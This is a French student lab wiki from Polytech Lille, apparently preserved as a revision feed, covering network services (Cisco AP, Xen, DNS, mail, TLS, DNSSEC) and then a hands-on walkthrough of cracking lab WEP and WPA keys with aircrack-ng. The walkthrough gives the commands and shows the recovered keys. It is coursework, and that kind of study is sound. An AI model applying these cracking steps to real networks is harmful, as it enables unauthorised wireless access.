 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35664</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35664"/>
				<updated>2016-12-06T11:34:41Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;TABLE BORDER=&amp;quot;1&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;CAPTION&amp;gt; Récapitulatif des IP &amp;lt;/CAPTION&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; N° VLAN &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Prénom &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Réseau local &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Nom VM &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; @IP VM &amp;lt;/TH&amp;gt;&lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN20 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Dimitri &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.20.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Vald &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.182/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN21 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Nabil &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.21.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Pnl &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.177/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN22 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Otmane &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.22.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Lartiste &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.178/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN23 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Hugo &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.23.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gradur &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.179/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Clement &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.24.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gringe &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.180/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN25 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Joan &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.25.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Orelsan &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.181/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
&amp;lt;/TABLE&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accès Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accès Cisco et à l'aide de la commande ci-dessous, on trouve sur quel port USB se trouve notre point d'accès&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètres de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accès de notre point d'accès&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous ne possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuelle pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuelle.&lt;br /&gt;
Pour créer la machine virtuelle, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connexion à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du à la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mails, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci-dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signer les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est nécessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
